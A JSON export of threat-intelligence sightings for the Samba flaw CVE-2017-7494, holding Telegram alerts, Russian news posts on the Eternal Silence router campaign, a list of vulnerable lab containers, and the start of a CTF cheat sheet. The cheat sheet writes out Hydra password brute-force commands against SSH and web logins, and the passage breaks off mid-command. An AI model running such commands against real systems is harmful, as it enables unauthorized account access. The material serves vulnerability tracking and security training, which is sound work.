"2023-11-12T03:06:28.000000Z"}, {"uuid": "0d213501-ff7b-4fa4-98f8-0bd1313c8cbf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "seen", "source": "https://t.me/arpsyndicate/1576", "content": "#ExploitObserverAlert\n\nCVE-2017-7494\n\nDESCRIPTION: Exploit Observer has 271 entries related to CVE-2017-7494. Samba since version 3.5.0 and before 4.6.4, 4.5.10 and 4.4.14 is vulnerable to remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it.\n\nFIRST-EPSS: 0.972640000\nNVD-IS: 5.9\nNVD-ES: 3.9", "creation_timestamp": "2023-12-08T14:25:49.000000Z"}, {"uuid": "93c6682a-fd03-4cd4-8485-991d945fcc92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "seen", "source": "https://t.me/arpsyndicate/1512", "content": "#ExploitObserverAlert\n\nCVE-2017-7494\n\nDESCRIPTION: Exploit Observer has 273 entries related to CVE-2017-7494. Samba since version 3.5.0 and before 4.6.4, 4.5.10 and 4.4.14 is vulnerable to remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it.\n\nFIRST-EPSS: 0.972640000\nNVD-IS: 5.9\nNVD-ES: 3.9", "creation_timestamp": "2023-12-06T16:50:19.000000Z"}, {"uuid": "76607940-741c-4af3-b964-90e10d1a6c76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "published-proof-of-concept", "source": "https://t.me/NewBlood_Project/446", "content": "Docker Containers of Intentionally Vulnerable Systems\n\n* Damn Vulnerable Web Application DVWA \ndocker pull citizenstig/dvwa\n\n* OWASP Juice Shop \ndocker pull bkimminich/juice-shop\n\n* OWASP Mutillidae II Web Pen-Test Practice Application \ndocker pull citizenstig/nowasp\n\n* OWASP NodeGoat \ndocker-compose build &amp;&amp; docker-compose up\n\n* OWASP Security Shepherd \ndocker pull ismisepaul/securityshepherd\n\n* OWASP WebGoat Project 7.1 docker image \ndocker pull webgoat/webgoat-7.1\n\n* OWASP WebGoat Project 8.0 docker image \ndocker pull webgoat/webgoat-8.0\n\n* Vulnerability as a service: Heartbleed \ndocker pull hmlio/vaas-cve-2014-0160\n\n* Vulnerability as a service: SambaCry \ndocker pull vulnerables/cve-2017-7494\n\n* Vulnerability as a service: Shellshock \ndocker pull hmlio/vaas-cve-2014-6271\n\n* Vulnerable WordPress Installation \ndocker pull wpscanteam/vulnerablewordpress\n\n\nDocker Containers of Penetration Testing Distributions and Tools\n\n* Docker Bench for Security \ndocker pull diogomonica/docker-bench-security\n\n* Official Kali Linux \ndocker pull kalilinux/kali-linux-docker\n\n* Official OWASP ZAP  \ndocker pull owasp/zap2docker-stable\n\n* Official WPScan \ndocker pull wpscanteam/wpscan\n\n* Security Ninjas \ndocker pull opendns/security-ninjas\n\n* docker-metasploit \ndocker pull phocean/msf", "creation_timestamp": "2023-03-18T23:40:27.000000Z"}, {"uuid": "538f9fb1-b65c-4533-adc5-4c69dfe02180", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "exploited", "source": "https://t.me/true_secator/2579", "content": "Eternal Silence \u0437\u0430\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0435\u0442 \u0442\u044b\u0441\u044f\u0447\u0438 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u043e\u0432, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f Universal Plug and Play (UPnP) \u0438 \u043f\u0440\u0435\u0432\u0440\u0430\u0449\u0430\u044f \u0438\u0445 \u0432 \u043f\u0440\u043e\u043a\u0441\u0438-\u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0445\u0430\u043a\u0435\u0440\u0430\u043c\u0438 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a.\n\n\u041f\u0440\u043e\u0442\u043e\u043a\u043e\u043b UPnP \u043f\u043e\u043c\u0438\u043c\u043e \u0443\u0434\u043e\u0431\u0441\u0442\u0432\u0430 \u0432 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u0435\u0440\u0435\u0430\u0434\u0440\u0435\u0441\u0430\u0446\u0438\u0438 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u0432 \u0441\u0435\u0442\u0438, \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c \u0434\u043b\u044f \u0430\u0442\u0430\u043a, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0445 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u043c \u0441\u0443\u0431\u044a\u0435\u043a\u0442\u0430\u043c \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0442\u044c \u0437\u0430\u043f\u0438\u0441\u0438 \u043f\u0435\u0440\u0435\u0430\u0434\u0440\u0435\u0441\u0430\u0446\u0438\u0438 \u043f\u043e\u0440\u0442\u043e\u0432 UPnP \u0447\u0435\u0440\u0435\u0437 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u0435 WAN-\u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430.\n\n\u0418\u043c\u0435\u043d\u043d\u043e \u0442\u0430\u043a\u0438\u0435 \u0430\u0442\u0430\u043a\u0438 \u043f\u043e\u0434 \u0443\u0441\u043b\u043e\u0432\u043d\u044b\u043c \u043d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435\u043c UPnProxy \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0438\u0437 Akamai, \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0432\u0448\u0438\u0435 \u0437\u0430 \u0430\u043a\u0442\u043e\u0440\u043e\u043c, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u043c \u044d\u0442\u0443 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u043f\u0440\u043e\u043a\u0441\u0438-\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432, \u0441\u043a\u0440\u044b\u0432\u0430\u044e\u0449\u0438\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438.\n\nAkamai \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u044e\u0442, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u044d\u043a\u0441\u043b\u043f\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 EternalBlue (CVE-2017-0144) \u0438 EternalRed (CVE-2017-7494) \u0432 \u043d\u0435\u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 Windows \u0438 Linux \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e.\n\n\u041f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u0442\u0435\u043b\u0438 Akamai \u043f\u0440\u0435\u0434\u0440\u0435\u043a\u0430\u044e\u0442 \u0441\u043a\u043e\u0440\u043e\u0435 \u0437\u0430\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u0435 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438. \u041e\u0434\u043d\u0430\u043a\u043e \u0446\u0438\u0444\u0440\u044b \u0433\u043e\u0432\u043e\u0440\u044f\u0442 \u043e\u0431 \u043e\u0431\u0440\u0430\u0442\u043d\u043e\u043c: \u0438\u0437 3\u00a0500\u00a0000 UPnP-\u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u043e\u0432, \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u044b\u0445 \u0432 \u0441\u0435\u0442\u0438, 277\u00a0000 \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u0434\u043b\u044f UPnProxy, \u0430 45\u00a0113 \u0438\u0437 \u043d\u0438\u0445 \u0443\u0436\u0435 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u044b \u0445\u0430\u043a\u0435\u0440\u0430\u043c\u0438.\n\n\u0412 \u0446\u0435\u043b\u043e\u043c, Eternal Silence \u2014 \u043e\u0447\u0435\u043d\u044c \u0445\u0438\u0442\u0440\u0430\u044f \u0430\u0442\u0430\u043a\u0430, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u043e\u043d\u0430 \u0434\u0435\u043b\u0430\u0435\u0442 \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0443 \u0441\u0435\u0433\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438 \u0441\u0435\u0442\u0438 \u043d\u0435\u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u043e\u0439 \u0438 \u043d\u0435 \u0434\u0430\u0435\u0442 \u043d\u0438\u043a\u0430\u043a\u0438\u0445 \u043f\u0440\u0438\u0437\u043d\u0430\u043a\u043e\u0432 \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0441 \u0436\u0435\u0440\u0442\u0432\u043e\u0439. \u041b\u0443\u0447\u0448\u0438\u0439 \u0441\u043f\u043e\u0441\u043e\u0431 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0438\u0442\u044c, \u0431\u044b\u043b\u0438 \u043b\u0438 \u0437\u0430\u0445\u0432\u0430\u0447\u0435\u043d\u044b \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430, \u2014 \u044d\u0442\u043e \u043f\u0440\u043e\u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432\u0441\u0435 \u043a\u043e\u043d\u0435\u0447\u043d\u044b\u0435 \u0442\u043e\u0447\u043a\u0438 \u0438 \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u0437\u0430\u043f\u0438\u0441\u0438 \u0432 \u0442\u0430\u0431\u043b\u0438\u0446\u0435 NAT.\n\n\u0415\u0441\u0442\u044c \u043c\u043d\u043e\u0433\u043e \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u0432 \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u044d\u0442\u043e, \u043d\u043e Akamai \u0443\u0434\u043e\u0431\u043d\u043e \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u0438\u043b\u0430 \u044d\u0442\u043e\u0442 bash-\u0441\u043a\u0440\u0438\u043f\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043c\u043e\u0436\u043d\u043e \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0434\u043b\u044f \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0433\u043e URL-\u0430\u0434\u0440\u0435\u0441\u0430.\n\n\u0418 \u0435\u0441\u043b\u0438 \u0432\u044b \u0432\u0441\u0435 \u0436\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Eternal Silence \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e, \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 UPnP \u043d\u0435 \u043e\u0447\u0438\u0441\u0442\u0438\u0442 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0438 NAT.\u00a0\u0412\u043c\u0435\u0441\u0442\u043e \u044d\u0442\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u043f\u043e\u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u043f\u0435\u0440\u0435\u0437\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u0438\u043b\u0438 \u043f\u0440\u043e\u0448\u0438\u0442\u044c \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e.", "creation_timestamp": "2022-02-01T18:44:27.000000Z"}, {"uuid": "c31a64b1-016f-4458-8622-bc6ef4323be1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "exploited", "source": "https://t.me/NeKaspersky/1753", "content": "\u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0430\u044f \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u00abEternal scilence\u00bb \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 UPnP \u0438 \u043f\u0440\u0435\u0432\u0440\u0430\u0449\u0430\u0435\u0442 \u0440\u043e\u0443\u0442\u0435\u0440\u044b \u0432 \u043f\u0440\u043e\u043a\u0441\u0438 \u0434\u043b\u044f \u0441\u043e\u043a\u0440\u044b\u0442\u0438\u044f \u0434\u0440\u0443\u0433\u043e\u0439 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438.\n\nUPnP (universal plug and play) - \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b, \u043e\u043f\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0439 \u0432 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u0435 \u0441\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0445 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u043e\u0432; \u043e\u043d \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0434\u0440\u0443\u0433\u0438\u043c \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u043c \u0432 \u0441\u0435\u0442\u0438 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c \u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u043f\u0440\u043e\u0431\u0440\u043e\u0441\u0430 \u043f\u043e\u0440\u0442\u043e\u0432, \u0447\u0442\u043e\u0431\u044b \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u043c\u043e\u0433\u043b\u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0434\u0435\u0432\u0430\u0439\u0441\u0430\u043c \u0432\u043d\u0443\u0442\u0440\u0438 \u0441\u0435\u0442\u0438 \u043f\u043e \u043c\u0435\u0440\u0435 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u0438. \u0422\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u044f, \u043e\u0434\u043d\u0430\u043a\u043e, \u0434\u0430\u043b\u0435\u043a\u043e \u043d\u0435 \u0441\u0442\u043e\u043b\u044c \u0436\u0435 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0430, \u0441\u043a\u043e\u043b\u044c \u0443\u0434\u043e\u0431\u043d\u0430: \u0437\u0430 \u0432\u0440\u0435\u043c\u044f \u0435\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043e\u0432\u0430\u043d\u0438\u044f \u0432 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u0438\u043c\u043f\u043b\u0435\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f\u0445 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u043b\u0438\u0441\u044c \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u0432 \u0445\u043e\u0434\u0435 \u0434\u0430\u043d\u043d\u043e\u0439 \u0430\u0442\u0430\u043a\u0438, \u043d\u0430\u0437\u0432\u0430\u043d\u043d\u043e\u0439 Akamai (\u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c\u0438, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0448\u0438\u043c\u0438 \u0435\u0435) \u00abUPnProxy\u00bb.\n\n\u0415\u0441\u043b\u0438 \u0432\u0435\u0440\u0438\u0442\u044c \u0434\u043e\u043a\u043b\u0430\u0434\u0443, 277,000 \u0438\u0437 3,500,000 \u0440\u043e\u0443\u0442\u0435\u0440\u043e\u0432 \u0441 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u043e\u0439 \u0434\u0430\u043d\u043d\u043e\u0439 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u0434\u043b\u044f \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0445, \u0438 45,113 \u0443\u0436\u0435 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u044b. \u0410\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 EternalBlue (CVE-2017-0144) \u0438 EternalRed (CVE-2017-7494) \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f RCE \u043d\u0430 \u043d\u0435\u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0435\u043d\u043d\u044b\u0445 windows \u0438 Linux \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 \u0441\u043e\u043e\u0442\u0432\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e. \u0414\u0430\u043b\u0435\u0435 \u0441\u043e\u0437\u0434\u0430\u044e\u0442\u0441\u044f \u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u0434\u043b\u044f \u043f\u0440\u043e\u0431\u0440\u043e\u0441\u0430 \u043f\u043e\u0440\u0442\u043e\u0432 \u0441 \u0437\u0430\u0431\u0430\u0432\u043d\u043e\u0439 \u0444\u0440\u0430\u0437\u043e\u0439 - \u00abgalleta silenciosa\u00bb (\u0442\u0438\u0445\u0430\u044f \u043f\u0435\u0447\u0435\u043d\u044c\u043a\u0430 \u0432 \u043f\u0435\u0440\u0435\u0432\u043e\u0434\u0435 \u0441 \u0438\u0441\u043f\u0430\u043d\u0441\u043a\u043e\u0433\u043e).\n\nAkamai \u0442\u0430\u043a\u0436\u0435 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u0438\u043b\u0438 bash-\u0441\u043a\u0440\u0438\u043f\u0442, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0439 \u043e\u0447\u0438\u0441\u0442\u0438\u0442\u044c \u0443\u0436\u0435 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0435 \u0434\u0435\u0432\u0430\u0439\u0441\u044b.\n@NeKaspersky", "creation_timestamp": "2022-01-31T19:14:02.000000Z"}, {"uuid": "683af177-9e29-49e6-807a-bcab0e99152b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "exploited", "source": "https://t.me/information_security_channel/5393", "content": "#Metasploit module for critical Samba remote code execution CVE-2017-7494 flaw released (check article for link) https://t.co/3cDpgKspVN", "creation_timestamp": "2017-05-25T09:39:43.000000Z"}, {"uuid": "23afea2f-3e15-4017-8018-8f85357bd3fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "exploited", "source": "https://t.me/information_security_channel/5415", "content": "RT @TheHackersNews: #Metasploit module for critical Samba remote code execution CVE-2017-7494 flaw released (check article for link) https:\u2026", "creation_timestamp": "2017-05-25T19:39:00.000000Z"}, {"uuid": "c2b0ed8e-e6cf-403d-bd31-1ea2cc71c646", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "exploited", "source": "https://t.me/information_security_channel/5439", "content": "POC Exploit for #Samba CVE-2017-7494 Remote Code Execution Vulnerability https://t.co/3cDpgKspVN #Linux https://t.co/aiLO97qavB", "creation_timestamp": "2017-05-26T12:18:23.000000Z"}, {"uuid": "8fbbc86b-091c-4ecb-8a61-d733d879c4e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "exploited", "source": "https://t.me/information_security_channel/5452", "content": "RT @TheHackersNews: POC Exploit for #Samba CVE-2017-7494 Remote Code Execution Vulnerability https://t.co/3cDpgKspVN #Linux https://t.co/ai\u2026", "creation_timestamp": "2017-05-26T17:01:09.000000Z"}, {"uuid": "e73572bc-78c5-427e-b457-7f4d07a31815", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "exploited", "source": "https://t.me/information_security_channel/6928", "content": "Warning: A New #Linux Malware is Exploiting #SambaCry Vulnerability (CVE-2017-7494) to Silently Backdoor NAS Device\u2026 https://t.co/vJY13xKx22", "creation_timestamp": "2017-07-19T10:25:48.000000Z"}, {"uuid": "83283aa7-36f8-49af-8ce6-d9d2326f12a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "exploited", "source": "https://t.me/information_security_channel/6937", "content": "RT @TheHackersNews: Warning: A New #Linux Malware is Exploiting #SambaCry Vulnerability (CVE-2017-7494) to Silently Backdoor NAS Device\u2026", "creation_timestamp": "2017-07-19T16:48:53.000000Z"}, {"uuid": "4fed918e-4bb0-4d20-b6a3-09088838e5ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "published-proof-of-concept", "source": "Telegram/BRcKmwGCn7AKyPKqoxBLp2JWy3Tb4TJPxCfPQDWXx58", "content": "", "creation_timestamp": "2017-05-26T17:54:42.000000Z"}, {"uuid": "2d39858c-1598-4367-9bbc-002c5f1b95f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "seen", "source": "Telegram/E3Mt7Wt0Y7SrCOseDNzAt0Rpzrd23D7oGs0-L7Q3PFYpECA", "content": "", "creation_timestamp": "2023-12-14T23:50:58.000000Z"}, {"uuid": "d79ae0cd-61c2-4af0-a716-88d46ceb4493", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "exploited", "source": "Telegram/ct0CzZITAqtBmCMIvmvSvd7G089Nlrmg58G4HGGM02Pmfo4", "content": "", "creation_timestamp": "2023-12-14T23:52:42.000000Z"}, {"uuid": "634a49c6-7537-47d3-a17a-cff4cb6fc688", "vulnerability_lookup_origin": "caeb2787-0d58-4236-9039-7c86c3e566f3", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/2ba77035-cab9-4576-8362-30da4500d213", "content": "", "creation_timestamp": "2026-06-19T12:46:57.802881Z"}, {"uuid": "23bfd207-d552-4f2b-9770-6cc1df688eb4", "vulnerability_lookup_origin": "caeb2787-0d58-4236-9039-7c86c3e566f3", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/b8cf897d-be30-4acc-818a-aad7cb4ec02d", "content": "", "creation_timestamp": "2026-06-23T14:05:38.679690Z"}, {"uuid": "54d388dc-adaf-4e70-bf8b-7f6440592bf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-7494", "type": "seen", "source": "https://gist.github.com/riskiidice/0a6702cea85c5df6bacd134a483e46cd", "content": "# CTF Basic Tools &amp; Quick Reference\n\nEssential tools for common CTF tasks. Simple commands, real usage.\n\n---\n\n## Table of Contents\n\n1. [Hydra - Password Brute-Forcing](#1-hydra---password-brute-forcing)\n2. [Gobuster &amp; Dirb - Web Directory Enumeration](#2-gobuster--dirb---web-directory-enumeration)\n3. [SQLMap - SQL Injection](#3-sqlmap---sql-injection)\n4. [Nmap - Network Scanning](#4-nmap---network-scanning)\n5. [Netcat &amp; Reverse Shells](#5-netcat--reverse-shells)\n6. [Hashcat &amp; John - Hash Cracking](#6-hashcat--john---hash-cracking)\n7. [SearchSploit - Exploit Search](#7-searchsploit---exploit-search)\n8. [FFUF - Web Fuzzing](#8-ffuf---web-fuzzing)\n9. [Metasploit Framework](#9-metasploit-framework)\n10. [Webshells &amp; File Upload](#10-webshells--file-upload)\n11. [Mount &amp; Extract ISO/IMG](#11-mount--extract-isoimg)\n\n---\n\n## 1. Hydra - Password Brute-Forcing\n\n### What is Hydra?\n\nHydra is a parallelized login cracker supporting 50+ protocols (SSH, FTP, HTTP, SMB, etc.). Use it when you have a username and need to find the password, or when you have a password and need to find the username.\n\n**When to use:**\n- SSH/HTTP/FTP login page is not rate-limited\n- You found a username but not the password\n- You have a user list and password wordlist\n- CTF says \"brute-force the login\"\n\n**Installation:**\n```bash\napt-get install hydra        # Debian/Ubuntu\nbrew install hydra           # macOS\n```\n\n### Real Usage Examples\n\n#### Example 1: SSH Brute Force (most common CTF pattern)\n\n```bash\n# You found username \"admin\" on the target. Now brute-force the password.\nhydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.10\n\n# Output looks like:\n# [22][ssh] host: 10.10.10.10   login: admin   password: password123\n\n# If SSH is on a non-default port:\nhydra -l admin -P pass.txt ssh://10.10.10.10 -s 2222\n```\n\n**When to use this:** You ran nmap and found port 22 open. SSH often has weak passwords in CTFs. rockyou.txt is the standard wordlist.\n\n#### Example 2: HTTP POST Form Login\n\n```bash\n# Common CTF pattern: /login or /admin endpoint\n# First, capture the exact form parameters by looking at the page source or using Burp\n\n# Structure: hydra target http-post-form \"PATH:BODY:FAIL_MSG\"\nhydra -l admin -P pass.txt 10.10.10.10 http-post-form \"/login:username=^USER^&amp;password=^PASS^:Invalid credentials\"\n\n# What each part means:\n# /login                           \u2192 login page path\n# username=^USER^&amp;password=^PASS^  \u2192 form fields (^USER^ and ^PASS^ are Hydra variables)\n# Invalid credentials               \u2192 failure message (Hydra knows success when this is ABSENT)\n\n# If the fail message is \"Login failed\":\nhydra -l admin -P pass.txt 